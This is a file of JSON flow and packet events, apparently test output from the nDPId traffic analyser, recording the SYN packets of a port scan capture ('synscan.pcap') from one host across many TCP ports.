+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAszkkAADsGPymsEAAIQA2GNIzSW87dUoMYAAAAAGACEADMwAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsUbIAADYGwMCsEAAIQA2GNIzSBCfdUoMYAAAAAGACDAAoaAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsplEAADUGbSGsEAAIQA2GNIzSE4vdUoMYAAAAAGACCAAdBAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsursAADMGWresEAAIQA2GNIzSxczdUoMYAAAAAGACEABiwgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsJh4AAC4G9FSsEAAIQA2GNIzSBIDdUoMYAAAAAGACDAAoDwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsq7AAACUGd8KsEAAIQA2GNIzSatndUoMYAAAAAGACCADFtQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3t0AADYGM5WsEAAIQA2GNIzSG1\/dUoMYAAAAAGACDAARMAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsZAcAADUGr2usEAAIQA2GNIzSFxvdUoMYAAAAAGACCAAZdAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3XEAADEGOgGsEAAIQA2GNIzSBNLdUoMYAAAAAGACCAArvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs7\/kAADEGJ3msEAAIQA2GNIzSFyXdUoMYAAAAAGACCAAZagAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061111,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_packet_id":1,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061111,"pkt":"ACYLMQczACWzv5HuCABFAAAs8psAADoGG9esEAAIQA2GNIzSxNXdUoMYAAAAAGACDABnuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061153,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_packet_id":1,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061153,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXUAADkGUf2sEAAIQA2GNIzTBH3dU4MZAAAAAGACCAAsDwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9iAAADMGH1KsEAAIQA2GNIzTQmHdU4MZAAAAAGACEADmKgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsvj8AADkGUTOsEAAIQA2GNIzTGWbdU4MZAAAAAGACCAAXJgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsM3gAADYG3vqsEAAIQA2GNIzT\/23dU4MZAAAAAGACDAAtHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAszqIAADIGR9CsEAAIQA2GNIzTD0rdU4MZAAAAAGACDAAdQgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AQAACkGK26sEAAIQA2GNIzTBCHdU4MZAAAAAGACCAAsawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs1iEAACcGS1GsEAAIQA2GNIzTF3TdU4MZAAAAAGACEAARGAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs+tUAAC4GH52sEAAIQA2GNIzTGoXdU4MZAAAAAGACDAASBwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAso94AADIGcpSsEAAIQA2GNIzTwA\/dU4MZAAAAAGACDABsfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsjjIAADgGgkCsEAAIQA2GNIzTPpLdU4MZAAAAAGACBAD1+QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAslp4AADEGgNSsEAAIQA2GNIzTzlbdU4MZAAAAAGACCABiNQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsSfoAADIGzHisEAAIQA2GNIzTDRfdU4MZAAAAAGACDAAfdQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsZi0AAC0GtUWsEAAIQA2GNIzTF\/HdU4MZAAAAAGACCAAYmwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 